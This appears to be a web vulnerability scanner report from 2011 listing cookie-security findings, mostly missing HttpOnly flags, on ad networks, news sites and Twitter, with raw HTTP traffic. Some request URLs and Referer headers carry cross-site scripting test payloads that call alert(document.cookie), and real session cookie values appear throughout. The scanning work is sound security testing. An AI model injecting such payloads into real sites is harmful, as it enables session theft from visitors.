GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/8/2011+3:06:08+AM; z=4; sid=9ceb3417-a6c7-439a-a223-e9ad8d9afb02; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sat, 29 Jan 2011 00:42:58 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: z=4; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sat, 29 Jan 2011 00:42:57 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: cmggl=1; Domain=.eyereturn.com; Expires=Sun, 27-Feb-2011 23:48:59 GMT; Path=/ Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/ Location: http://voken.eyereturn.com/pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 Content-Length: 0 Date: Fri, 28 Jan 2011 23:48:58 GMT Connection: close Server: eyeReturn Ad Serveri 6
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?233374&click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000943795/cstr=91575939=_4d4372e7,6205162343,766161^943795^1183^0,1_/xsxdata=$xsxdata/bnum=91575939/optn=64?trg=¶ms=6205162343 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:52:40 GMT Server: eyeReturn Ad Server Content-Length: 14762
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233375';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_728x90_f_30_v1.swf';er_token ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=¶ms=8830366303 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Fri, 28 Jan 2011 23:48:58 GMT Connection: close Server: eyeReturn Ad Serveri 6 Content-Length: 14757
//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved // er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pix?223686 HTTP/1.1 Host: voken.eyereturn.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV" Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Fri, 28 Jan 2011 23:49:08 GMT Connection: close Server: eyeReturn Ad Serveri 6
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: xads.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Fri, 28 Jan 2011 15:06:31 GMT Server: ZEDO 3G Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/; Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ Vary: Accept-Encoding Content-Length: 402 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/ ...[SNIP]...
11. Cookie without HttpOnly flag setpreviousnext There are 577 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1 Host: ad.doubleclick.net.57389.9231.302br.net Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=1B2A83185956BA19ABB6FE6E70A6C415; Path=/ Content-Type: text/html Content-Length: 7169 Date: Fri, 28 Jan 2011 22:47:58 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1 Host: ad.doubleclick.net.57390.9231.302br.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=23121407506AF928BA0892656699F17B; Path=/ Content-Type: text/javascript Content-Length: 6792 Date: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/ads.js?uid=7hSy8PbjRnOXSf2i_40364845 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FC8FA945550B733F43B55297886838C8; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Fri, 28 Jan 2011 15:00:09 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69537&cid=EI9-DR-Interclick&vchannel=12553&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D54%25252c55%2526b%253D12553%2526cid%253D1211388088786%2526isif%253Df%2526rurld%253Dwww.cbs6albany.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.cbs6albany.com%252Falbany-weather-forecast%25253Fdec0c%252527%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C%252Fscript%2525253E262a2c2a00e%25253D1%2526rurl%253Dhttp%25253A%25252F%25252Fburp%25252Fshow%25252F70%2526blkAdxp%253D1 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DF1B104B3D685EBD40E943AD4EEF4B96; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 845 Date: Sat, 29 Jan 2011 13:38:46 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: ads2.adbrite.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=61FCC3DEA075A87386A0EA6878423D23; Path=/ Location: http://bounce.adbrite.com/ Content-Type: text/html Date: Sat, 29 Jan 2011 14:20:55 GMT Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=16101423669632,d=1294435351
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 14:03:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-type: application/x-javascript max-age: 1800 Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT Content-Length: 16698 Content-Type: text/html Set-Cookie: ASPSESSIONIDQQRSRACD=EJCEGDPBIPCHGMBALKMGHIFF; path=/ Cache-control: public
lpAddMonitorTag(); //DO NOT CHANGE THE BELOW COMMENT //PLUGINS_LIST=globalUtils,inputboxHandler if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /visitor/addons/deploy.asp?site=5296924&d_id=1 HTTP/1.1 Host: base.liveperson.net Proxy-Connection: keep-alive Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LivePersonID=LP i=16101423669632,d=1294435351
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 13:59:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-type: application/x-javascript max-age: 1800 Last-Modified: Fri, 07 Jan 2011 16:10:14 GMT Content-Length: 16698 Content-Type: text/html Set-Cookie: ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; path=/ Cache-control: public
lpAddMonitorTag(); //DO NOT CHANGE THE BELOW COMMENT //PLUGINS_LIST=globalUtils,inputboxHandler if (typeof(lpMTagConfig.plugins)=='undefined') { lpMTagConfig.plugins = {};}
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1 Host: boston30.autochooser.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:21:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI" Content-Type: text/html Expires: Fri, 28 Jan 2011 05:20:30 GMT Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/ Cache-control: private Content-Length: 74164
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F7984D788D573EFCDF0206C9A4486038; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 106 Date: Fri, 28 Jan 2011 15:00:16 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845");
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepagems3.asp HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=a3osnfcnbh4c5bqf8iouogi697; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /zip.aspx HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.3.2 Content-Type: text/html; charset=UTF-8 Expires: Fri, 28 Jan 2011 16:59:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 28 Jan 2011 16:59:34 GMT Content-Length: 15938 Connection: close Set-Cookie: PHPSESSID=a3osnfcnbh4c5bqf8iouogi697; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support.moxiesoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 25701 Content-Type: text/html Expires: Fri, 28 Jan 2011 14:10:59 GMT Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/ Cache-control: private
<!-- Function getOwnerIDforUser(sEmailId) Dim objUser Dim sSql Dim objADOConnection Dim sconnString Dim objOwnerId
Set objADOConnection = Server.CreateObject("ADODB.Connection")
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:36 GMT Server: hi Status: 200 OK X-Transaction: 1296224736-35616-58920 ETag: "ce84c6d523ac490f74725d4e72e7cdcf" Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT X-Runtime: 0.01412 Content-Type: text/html; charset=utf-8 Content-Length: 44218 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=12962241848871382; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /247realmedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
